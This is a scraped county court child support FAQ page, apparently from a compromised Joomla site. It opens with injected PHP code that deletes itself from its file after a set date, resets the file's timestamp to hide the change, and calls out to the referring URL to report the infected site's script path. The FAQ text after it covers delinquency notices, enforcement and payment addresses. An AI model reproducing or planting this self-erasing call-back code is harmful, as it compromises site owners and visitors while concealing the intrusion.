check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Child Support FAQ's
Home Child Support FAQ's

More... Quick Links

Child Support Frequently Asked Questions
  Toggle all descriptions Collapse all descriptions
Frequently Asked Questions (Click to sort)
What do I do if I am up-to-date on my child support payments, but I receive a delinquency notice?

You will need to:

  • Come into the Family Division and request a child support payment history printout.
  • Using the payment history, look to see if there are any discrepancies where a
    payment was made but not accounted for.
  • After finding and marking the error, fill out an audit request. The child support
    Clerk will conduct an audit on your case.
  • We will inform Department of Revenue of the audit and compare with their balance
    in order to correct any discrepancies.
Who do I contact if the non-custodial parent/ex-spouse is not paying their child support?

IF the parties are contracted through the Department of Revenue:

  • Contact that office for enforcement

The motion will be sent to the appropriate judge and then his office will set it for a hearing.

Do you accept child support payments at the courthouse?

The Family Division can only process court ordered purge payments on the day of court. All
other payments must be made through:

State of Florida Disbursement Unit

PO Box 8500

Tallahassee, FL 32314-8500

You may also pay on-line at

When sending payments, please include your Social Security number, case number and name
of party receiving the child support payment.

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.